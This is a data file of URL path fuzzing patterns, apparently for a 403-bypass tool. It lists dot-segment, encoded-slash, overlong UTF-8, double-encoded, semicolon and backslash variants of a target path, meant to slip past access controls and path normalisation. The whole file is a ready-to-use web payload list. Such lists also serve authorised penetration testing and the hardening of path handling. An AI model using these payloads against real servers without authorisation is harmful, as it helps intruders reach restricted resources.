# Path patterns for URL path fuzzing. Placeholders: {path} full path, {stripped} without leading slash,
# {stripped_upper} / {stripped_lower} for case fuzzing, {long_dot_prefix} (64× ./), {long_encoded_dot_prefix} (13× %2F%2E).
{path}
{path}/
{path}//
/./{stripped}
/././{stripped}
/./{stripped}/./
/./././././{stripped}
/{stripped}
/{stripped_upper}
/{stripped_lower}
//{stripped}
/{stripped}//
/{stripped}/
/%2e/{stripped}
/%2e%2f{stripped}
/%2e%2e/{stripped}
/%2f{stripped}
/{stripped}%2f
/{stripped}%2f.
/{stripped}%2e
/{stripped}/.
/{stripped}/..;/
/{stripped}/%2e/
/{stripped}/%2e%2e/
/{stripped}/..%2f
/{stripped}%20
/{stripped}%09
/{stripped}?
/{stripped}.json
/{stripped}.html
/{stripped};
/{stripped};/
/{stripped}/...
/.../{stripped}
# iamj0ker / commons bypass-403 style: slashes, wildcards, semicolons
/{stripped}/*
/*/{stripped}/
/*/{stripped}
//{stripped}//
///{stripped}///
///{stripped}/
/./{stripped}/
/%2f{stripped}%2f
//;//{stripped}/
/%c0%af/{stripped}
/%e0%80%af/{stripped}
/{stripped}%c0%af
/{stripped}%e0%80%af
/.//{stripped}
/%2e%2f%2f{stripped}
/.;/{stripped}/./
/foo/../{stripped}
/foo//..//{stripped}
/foo%2F%2E%2E%2F{stripped}
/foo%252F%252E%252E%252F{stripped}
/foo\..\{stripped}
/foo\\..\\{stripped}
/{long_dot_prefix}{stripped}
/{long_encoded_dot_prefix}{stripped}
